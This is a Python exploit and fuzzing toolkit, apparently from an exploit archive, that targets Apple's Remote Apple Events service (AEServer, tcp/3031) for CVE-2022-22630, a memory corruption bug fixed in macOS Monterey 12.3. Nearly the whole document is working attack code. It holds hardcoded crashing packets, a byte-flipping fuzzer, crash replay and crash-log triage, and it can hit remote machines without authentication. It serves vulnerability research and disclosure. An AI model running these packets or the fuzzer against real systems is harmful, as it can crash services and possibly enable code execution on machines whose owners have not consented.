# Share
## https://sploitus.com/exploit?id=PACKETSTORM:168247
#!/usr/bin/env python  
# -*- coding: UTF-8 -*-  
#  
# naval.py  
#  
# Apple macOS Remote Events Remote Memory Corruption Vulnerability  
#  
# Jeremy Brown [jbrown3264/gmail]  
#  
# =====  
# Intro  
# =====  
#  
# [eppc] Hello from AEServer  
#  
# Remote Apple Events is a core service and remote system administration and automation  
# tool for Macs. It can be enabled via System Preferences -> Sharing and listens on  
# port tcp/3031 and may be used in enterprise environments for remote administration.  
# Sending malformed packets triggers a crash in the AEServer binary which may allow for  
# arbitrary code execution on the remote machine within the context of the _eppc user.  
# However, the crash is subtle as the service is automatically restarted and only a log  
# in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.  
#  
# Although a controlled, reliable crash at an arbitrary location is difficult, it was  
# eventually achieved during testing with repeated characters in packets during sessions.  
#  
# Thread 0 crashed with X86 Thread State (64-bit):  
# rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370  
# rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8  
# r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0  
# r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218  
# rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260  
#  
# While debugging it looks like the process is crashing when trying to release or  
# dereference memory that has been deallocated, likely a sign of a heap related bug  
# such as a use-after-free bug.  
#  
# This code serves as a toolkit to help debug and trigger crashes, but as mentioned  
# extensive testing was required to gain more precise control of rax/rcx. Also note  
# that authentication is not required to crash the service, either locally or remotely.
#  
# =======  
# Details  
# =======  
#  
# Much of the functionality depends on running this locally on the target box, such  
# as debugging with ReportCrash logs, but it can certainly trigger remote crashes too  
# if you pass the --remote flag (disables local debugging stuff).  
#  
# $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets  
# ....  
#  
# $ head crashes.txt  
# 1 - (0x7e @ 1) -> 0x20  
# [many more truncated]  
#  
# $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index  
# ....  
#  
# Then within 10 seconds, start the debugger on the local target.. GOGOGO  
#  
# $ sudo lldb -o "attach --name AEServer" -o c  
# ....  
#  
# (lldb) c  
# Process 50050 resuming  
# Process 50050 stopped  
# * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)  
# frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31  
#  
# And now you can explore the crash  
#  
# One can also check to see AEServer receiving packets:
# > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer  
#  
# ===  
# Fix  
# ===  
# - Addressed in Monterey 12.3  
#  
# CVE-2022-22630  
#  
  
import os  
import sys  
import argparse  
import datetime  
import time  
import psutil  
import shutil  
import signal  
import socket  
import random  
import re  
  
# Directory scanned for new AEServer crash reports, and the local directory
# that collected reports and repro files are moved into.
REPORT_DIR = '/Library/Logs/DiagnosticReports'
LOG_DIR = 'logs'

# TCP port of the eppc service.
PORT = 3031

# Per-run crash summary file, named after the start time of this process.
CRASH_LOG = f"crashes{datetime.datetime.now():%Y%m%d_%H%M%S}.txt"

# Default for local crash-report checking.
REPORT_CRASH = True

# Seconds to pause after connecting when --sleep is given.
SLEEP_TIME = 10

# Highest value a single packet byte can take.
MAX_BYTE = 0xff
  
#
# original packets
#
# The five-packet exchange used with --original (the "non-crashing" set).
# These are raw wire bytes: do not reformat or re-encode them.
# NOTE(review): PKT_4_ORIG and PKT_5_ORIG start with \x16\x03, which looks
# like TLS handshake records -- confirm against a capture before relying on it.
#
PKT_1_ORIG = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'
PKT_2_ORIG = b'\xe4LPRT\x01\xe1\x01\xe7\x06finder\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00'
PKT_3_ORIG = b'\xe4SREQ\xdf\xdf\xdf\xdf\xdf\x01\xe7\x06finder\xdf\xdb\xe5\x04B{\xbf\xac\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdc\xe5\x04test\xdf\xdd\x00'
PKT_4_ORIG = b'\x16\x03\x01\x00\x92\x01\x00\x00\x8e\x03\x03\x61\x00\x8b\x66\x96\xc7\x08\xa2\xe8\x0e\x53\x13\xbd\xd3\x1c\x69\x12\x43\xd3\x03\xe2\xec\x8d\x61\x3d\x01\xed\x67\xd7\x62\xf8\xca\x00\x00\x2c\x00\xff\xc0\x2c\xc0\x2b\xc0\x24\xc0\x23\xc0\x0a\xc0\x09\xc0\x08\xc0\x30\xc0\x2f\xc0\x28\xc0\x27\xc0\x14\xc0\x13\xc0\x12\x00\x9d\x00\x9c\x00\x3d\x00\x3c\x00\x35\x00\x2f\x00\x0a\x01\x00\x00\x39\x00\x0a\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00\x0d\x00\x12\x00\x10\x04\x01\x02\x01\x05\x01\x06\x01\x04\x03\x02\x03\x05\x03\x06\x03\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x12\x00\x00\x00\x17\x00\x00'
PKT_5_ORIG = b'\x16\x03\x03\x00\x46\x10\x00\x00\x42\x41\x04\x8d\xd9\xbc\x5f\x9b\x0d\x86\x28\xda\x1f\xba\x75\xe3\x01\x06\x73\xf4\x28\xe2\xe5\x9b\x2e\xfc\x75\x0c\xad\x3d\x7d\xc8\x59\xc0\x20\xce\xcb\xdf\x87\x88\x09\x46\x1f\xf3\x97\x3f\xb8\xd1\xc8\xf5\x4b\xa9\x9f\xdc\xae\xba\x75\x50\xfa\x96\xd5\xcf\xa2\xa4\xec\x7b\x61'

#
# crashing packets
#
# The two-packet exchange used by default. PKT_1 is byte-identical to
# PKT_1_ORIG; PKT_2 is PKT_2_ORIG with the 6-byte string "finder" replaced
# by "xxxyyy".
#
PKT_1 = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'
PKT_2 = b'\xe4LPRT\x01\xe1\x01\xe7\x06xxxyyy\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00' # s/finder/xxxyyy
  
class Naval(object):
    """Send, fuzz and replay packet exchanges against the eppc service.

    Behaviour is selected by the parsed command-line namespace handed to the
    constructor. run() is the entry point; like the other public methods it
    returns 0 on success and -1 on failure.
    """

    def __init__(self, args):
        """Copy the command-line options and reset all per-run state.

        args is the argparse namespace; its host, fuzz, replay, remote,
        reprofile, original and sleep attributes are read.
        """
        self.host = args.host
        self.fuzz = args.fuzz
        self.replay = args.replay
        self.remote = args.remote
        self.reprofile = args.reprofile
        self.original = args.original
        self.sleep = args.sleep

        # Crash-report checking reads local files, so --remote disables it.
        # Kept on the instance so that every method sees the same decision
        # (a plain assignment inside run() would only create a local).
        self.report_crash = REPORT_CRASH and not self.remote

        self.pkt1 = None
        self.pkt2 = None

        # original
        self.pkt3 = None
        self.pkt4 = None
        self.pkt5 = None

        # Slot (1-5) that sendPacket() fills with the mutated packet; 0 = none.
        self.pkt_pick = 0

        # Packet number, byte value and byte index of the current mutation.
        self.pkt_num = None
        self.byte = None
        self.index = None

        # Packets handed to the socket by the most recent exchange; written
        # to the repro file when a crash report shows up.
        self.sent = []

        # Directory listing of REPORT_DIR taken before the last exchange.
        self.logs = []

    def run(self):
        """Execute the mode selected on the command line.

        Returns 0 on success and -1 on any failure.
        """
        if self.report_crash and self._initReports() < 0:
            return -1

        if self.original:
            # non-crashing
            self.pkt1, self.pkt2 = PKT_1_ORIG, PKT_2_ORIG
            self.pkt3, self.pkt4, self.pkt5 = PKT_3_ORIG, PKT_4_ORIG, PKT_5_ORIG
        else:
            # crashing
            self.pkt1, self.pkt2 = PKT_1, PKT_2

        if self.replay and self._applyReplay() < 0:
            return -1

        if self.reprofile:
            if self.repro(self.reprofile) < 0:
                print("failed")
                return -1

            return 0

        status = self._fuzzAll() if self.fuzz else self._sendOnce()

        if status < 0:
            return -1

        print("done\n")

        return 0

    def _initReports(self):
        """Check that crash reporting is usable and snapshot REPORT_DIR."""
        #
        # sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
        #
        if 'ReportCrash' not in (proc.name() for proc in psutil.process_iter()):
            print("ReportCrash isn't running, make sure it's enabled first\n")
            return -1

        if not os.path.isdir(REPORT_DIR):
            print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR)
            return -1

        try:
            # Baseline listing: only reports that appear after this point
            # are attributed to packets sent by this run.
            self.logs = os.listdir(REPORT_DIR)
        except OSError as error:
            print("failed to list %s: %s\n" % (REPORT_DIR, error))
            return -1

        return 0

    def _applyReplay(self):
        """Parse the --replay "pkt:byte:index" spec and patch that packet."""
        fields = self.replay.split(':')

        if len(fields) != 3:
            print("invalid replay format: %s" % self.replay)
            return -1

        try:
            self.pkt_num = int(fields[0])
        except ValueError as error:
            print("packet number %s is invalid: %s" % (fields[0], error))
            return -1

        try:
            self.byte = int(fields[1], 16)
        except ValueError as error:
            print("byte %s is invalid: %s" % (fields[1], error))
            return -1

        try:
            self.index = int(fields[2])
        except ValueError as error:
            print("index %s is invalid: %s" % (fields[2], error))
            return -1

        if self.pkt_num not in (1, 2):
            print("pkt number must be 1 or 2")
            return -1

        source = self.pkt1 if self.pkt_num == 1 else self.pkt2
        pkt = self.modifyPacket(source, self.byte, self.index)

        if pkt is None:
            return -1

        # Store the patched packet so the exchange that follows actually
        # transmits it instead of the unmodified original.
        if self.pkt_num == 1:
            self.pkt1 = pkt
        else:
            self.pkt2 = pkt

        print("replaying packets\n")

        self.showRepro(pkt)

        return 0

    def _fuzzAll(self):
        """Fuzz every packet of the active exchange one after another."""
        for number, packet in enumerate(self._activePackets(), 1):
            print("fuzzing sequentially packet %d\n" % number)

            self.pkt_num = number

            if self.fuzzPacketSeq(packet) < 0:
                print("failed")
                return -1

        return 0

    def _sendOnce(self):
        """Send the active exchange a single time, aborting on any error."""
        if not self.replay:
            if self.original:
                print("sending original packets for testing\n")
            else:
                print("sending packets to trigger crash\n")

            self.showRepro([])

        sock = self._openConnection()

        if sock is None:
            return -1

        packets = self._activePackets()
        self.sent = [bytes(packet) for packet in packets]

        # "with" closes the socket on every exit path, including the
        # early returns below.
        with sock:
            if self.sleep:
                time.sleep(SLEEP_TIME)

            try:
                sock.send(packets[0])
                sock.recv(256)
            except OSError as error:
                print("failed to send/recv packet 1: %s\n" % error)
                return -1

            for number, packet in enumerate(packets[1:], 2):
                try:
                    sock.send(packet)
                except OSError as error:
                    print("failed to send packet %d: %s\n" % (number, error))
                    return -1

        if self.report_crash:
            self.checkReports()

        return 0

    def _activePackets(self):
        """Return the packets of the current exchange in send order."""
        packets = [self.pkt1, self.pkt2]

        if self.original:
            packets += [self.pkt3, self.pkt4, self.pkt5]

        return packets

    def _openConnection(self, retry=False):
        """Create a socket and connect it to (self.host, PORT).

        With retry=True a failed connect() is repeated until it succeeds,
        which is how the fuzz loop has always behaved (presumably to wait
        for the service to come back after a crash). Returns the connected
        socket, or None when no connection could be made.
        """
        while True:
            sock = self.getSock()

            if sock is None:
                return None

            try:
                sock.connect((self.host, PORT))
            except OSError as error:
                print("connect() failed: %s\n" % error)
                sock.close()  # do not leak one descriptor per failed attempt

                if not retry:
                    return None
            else:
                return sock

    def getSock(self):
        """Return a new TCP socket with a 1 second timeout, or None on error."""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(1)
        except OSError as error:
            print("socket() failed: %s\n" % error)
            return None

        return sock

    def fuzzPacketSeq(self, packet):
        """Run one exchange for every (index, byte value) mutation of packet.

        Each byte position is set to every value from 0 to MAX_BYTE in turn;
        the mutated copy is sent in the slot given by self.pkt_num. Returns 0
        when the sweep completes and -1 if a socket cannot be created.
        """
        # Tell sendPacket() which slot of the exchange carries the mutation.
        self.pkt_pick = self.pkt_num

        #
        # flip each byte in the packet sequentially from 0 ... 255
        #
        for index in range(len(packet)):
            for value in range(MAX_BYTE + 1):
                pkt = bytearray(packet)
                orig = pkt[index]
                pkt[index] = value

                self.index = index
                self.byte = value

                print("pkt @ index=%d (%s -> %s)" % (index, hex(orig), hex(value)))

                sock = self._openConnection(retry=True)

                if sock is None:
                    return -1

                with sock:
                    if self.sendPacket(sock, pkt) < 0:
                        print("sendPacket() failed\n")
                        return -1

                self.showRepro(pkt)

                if self.report_crash:
                    self.checkReports()

        return 0

    def createPacket(self, pkt_name):
        """Return between 8 and 4096 'B' bytes; pkt_name is only logged."""
        n = random.randint(8, 4096)

        print("created \\x42 x %d for %s\n" % (n, pkt_name))

        return b'B' * n

    def modifyPacket(self, pkt, byte, index):
        """Return a copy of pkt with the byte at index replaced by byte.

        Returns None (after printing the reason) when index is outside the
        packet or byte is not in the range 0x00 - 0xff.
        """
        if index < 0 or index >= len(pkt):
            print("index must be 0 - %d\n" % (len(pkt) - 1))
            return None

        try:
            patch = bytes([byte])
        except ValueError:
            print("byte must be 0x00 - 0xff\n")
            return None

        return pkt[:index] + patch + pkt[index + 1:]

    def sendPacket(self, sock, pkt):
        """Send the active exchange with pkt substituted into slot pkt_pick.

        When the original exchange is in use, each of packets 3-5 that is
        not the substituted slot is replaced by createPacket() output with
        probability 1/2. Socket errors are printed and the exchange carries
        on; the method always returns 0.
        """
        slots = [1, 2, 3, 4, 5] if self.original else [1, 2]
        payloads = [self._pickPayload(number, pkt) for number in slots]

        self._sendLenient(sock, payloads)

        return 0

    def _pickPayload(self, number, pkt):
        """Return the bytes to transmit in slot number of the exchange."""
        if self.pkt_pick == number:
            return pkt

        name = 'pkt%d' % number

        #
        # pick=1 means the stored packet doesn't change
        #
        if number >= 3 and random.randint(1, 2) == 2:
            setattr(self, name, self.createPacket(name))

        return getattr(self, name)

    def _sendLenient(self, sock, packets):
        """Send packets in order, printing (not raising) socket errors.

        A reply is read after every packet except packet 2 of the crashing
        pair. The packets are remembered in self.sent for repro files.
        """
        self.sent = [bytes(packet) for packet in packets]

        for number, payload in enumerate(packets, 1):
            try:
                sock.send(payload)

                if number != 2 or self.original:
                    sock.recv(256)  # not necessary for crashing packets 1 & 2
            except OSError as error:
                if number == 1 and isinstance(error, socket.timeout):
                    print("timed out")
                else:
                    print("send/recv failed for packet #%d: %s\n" % (number, error))

    def repro(self, filename):
        """Replay the packets stored in a repro file written by checkReports().

        The file holds one packet per line as \\xNN escapes: two lines for
        the crashing exchange, five when --original is set. Returns 0 on
        success, -1 if the file cannot be read or parsed or the connection
        fails.
        """
        print("reproing crash with %s\n" % os.path.basename(filename))

        try:
            with open(filename, 'r') as file:
                lines = file.readlines()
        except (OSError, UnicodeError) as error:
            print("failed to read file %s: %s" % (filename, error))
            return -1

        wanted = 5 if self.original else 2

        try:
            # strip() drops the line terminator, which bytes.fromhex()
            # rejects on older Python 3 releases.
            packets = [bytes.fromhex(lines[i].strip().replace('\\x', ''))
                       for i in range(wanted)]
        except (IndexError, ValueError) as error:
            print("failed to parse repro: %s" % error)
            return -1

        self.pkt1, self.pkt2 = packets[0], packets[1]

        if self.original:
            self.pkt3, self.pkt4, self.pkt5 = packets[2:5]

        sock = self._openConnection()

        if sock is None:
            return -1

        with sock:
            if self.sleep:
                time.sleep(SLEEP_TIME)

            self._sendLenient(sock, packets)

        self.showRepro([])

        if self.report_crash:
            self.checkReports()

        print("done\n")

        return 0

    def getHex(self, data):
        """Return data formatted as a string of \\xNN escapes."""
        return ''.join(f'\\x{byte:02x}' for byte in data)

    def printHex(self, data):
        """Print data formatted as a string of \\xNN escapes."""
        print(self.getHex(data))

    def showRepro(self, pkt):
        """Print the active exchange, one packet per line.

        pkt is shown in place of every stored packet that has the same
        length; pass an empty sequence to print the stored packets as they
        are. As a side effect packets 3-5 are reset to their originals.
        """
        for stored in self._activePackets():
            self.printHex(pkt if len(pkt) == len(stored) else stored)

        print()

        #
        # restore original packets
        #
        self.pkt3 = PKT_3_ORIG
        self.pkt4 = PKT_4_ORIG
        self.pkt5 = PKT_5_ORIG

    def checkReports(self):
        """Collect AEServer crash reports that appeared since the last check.

        Returns 0 on success and -1 on an I/O failure.
        """
        time.sleep(2)  # make sure ReportCrash has time to do its thing

        try:
            logs_now = os.listdir(REPORT_DIR)
        except OSError as error:
            print("failed to open %s for reading: %s\n" % (REPORT_DIR, error))
            return -1

        known = set(self.logs)

        #
        # if we have new crash logs, grab the pc and correlate it with repro
        #
        for log in logs_now:
            if log in known:
                continue

            if log.startswith('AEServer') and log.endswith('.crash'):
                if self._archiveCrash(log) < 0:
                    return -1

        #
        # reset logs after move
        #
        try:
            self.logs = os.listdir(REPORT_DIR)
        except OSError as error:
            print("failed to list %s: %s\n" % (REPORT_DIR, error))
            return -1

        return 0

    def _archiveCrash(self, log):
        """Summarise one new crash report and move it into LOG_DIR.

        Also moves a matching .ips file if present and writes a repro file
        with the packets of the last exchange. Returns 0 or -1.
        """
        log_file = os.path.join(REPORT_DIR, log)

        try:
            with open(log_file, 'r') as file:
                data = file.read()
        except (OSError, UnicodeError) as error:
            print("failed to read %s: %s\n" % (log, error))
            return -1

        # The first 0x-prefixed value in the report is used as the "pc".
        found = re.search(r'0x(.*)', data)

        if found is not None:
            pc = '0x' + found.group(1).lstrip('0')
        else:
            print("couldn't get pc from crash log\n")
            pc = 'unknown'  # keep the file names below well-formed

        print("found crash @ pc=%s\n" % pc)

        #
        # create a crash log if we're fuzzing bytes at indices
        #
        if self.fuzz:
            crash_info = 'pkt #%s - (byte=%s @ index=%s) -> %s\n' % (
                self.pkt_num, hex(self.byte), self.index, pc)

            try:
                with open(CRASH_LOG, 'a') as file:
                    file.write(crash_info)
            except OSError as error:
                print("failed to write %s: %s\n" % (crash_info, error))
                return -1

        try:
            os.makedirs(LOG_DIR, exist_ok=True)
        except OSError as error:
            print("failed to mkdir %s: %s\n" % (LOG_DIR, error))

        suffix = '_%s_%s_%s.txt' % (self.byte, self.index, pc)

        #
        # move crash log file
        #
        try:
            shutil.move(log_file, os.path.join(LOG_DIR, log + suffix))
        except OSError as error:
            print("failed to move %s: %s\n" % (log_file, error))
            return -1

        #
        # check if there's an associated .ips
        #
        ips_base = os.path.splitext(log)[0] + '.ips'
        ips_file = os.path.join(REPORT_DIR, ips_base)

        if os.path.isfile(ips_file):
            try:
                # Named after the .ips file itself so it cannot overwrite
                # the crash log that was just moved.
                shutil.move(ips_file, os.path.join(LOG_DIR, ips_base + suffix))
            except OSError as error:
                print("failed to move %s: %s\n" % (ips_file, error))
                return -1

        #
        # write repro: the packets that were actually transmitted, falling
        # back to the stored ones if nothing has been sent yet
        #
        repro_name = os.path.join(LOG_DIR, log + '_' + pc + '_repro.txt')
        packets = self.sent or self._activePackets()

        try:
            with open(repro_name, 'w') as file:
                file.write('\n'.join(self.getHex(packet) for packet in packets))
        except OSError as error:
            print("failed to write %s: %s\n" % (repro_name, error))
            return -1

        #
        # temporary to help triage crashing packets
        #
        if '424242' in pc:
            self.showRepro([])
            sys.exit(0)

        return 0
  
def stop(signum, frame):
    """Signal handler: emit a blank line and exit with status 0.

    signum and frame are supplied by the signal module and are not used.
    """
    sys.stdout.write("\n")
    raise SystemExit(0)
  
def arg_parse():
    """Parse the command line and return the argparse namespace.

    The namespace carries: host (str), fuzz, remote, original and sleep
    (bool, default False), and replay and reprofile (str or None).
    """
    parser = argparse.ArgumentParser()

    parser.add_argument("host",
                        type=str,
                        help="target listening on eppc port 3031")

    # Each option string is listed once; repeating it only duplicated the
    # flag in the generated usage/help text.
    parser.add_argument("--fuzz",
                        default=False,
                        action="store_true",
                        help="sequentially exhaust bytes in each packet and display crashing PC as available")

    parser.add_argument("--remote",
                        default=False,
                        action="store_true",
                        help="target remote hosts and disable local debugging support")

    parser.add_argument("--replay",
                        type=str,
                        help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")

    parser.add_argument("--reprofile",
                        type=str,
                        help="filename containing packet data on each line to replay (generated by random fuzzing)")

    parser.add_argument("--original",
                        default=False,
                        action="store_true",
                        help="use the original non-crashing packets")

    parser.add_argument("--sleep",
                        default=False,
                        action="store_true",
                        help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")

    return parser.parse_args()
  
def main():
    """Install the SIGINT handler, run the tool and set the exit status.

    Exits with status 1 when Naval.run() reports a failure.
    """
    signal.signal(signal.SIGINT, stop)

    args = arg_parse()

    nr = Naval(args)

    result = nr.run()

    # run() signals failure with -1, so testing for "> 0" never fired and
    # the process always exited with status 0.
    if result != 0:
        sys.exit(1)


if __name__ == '__main__':
    main()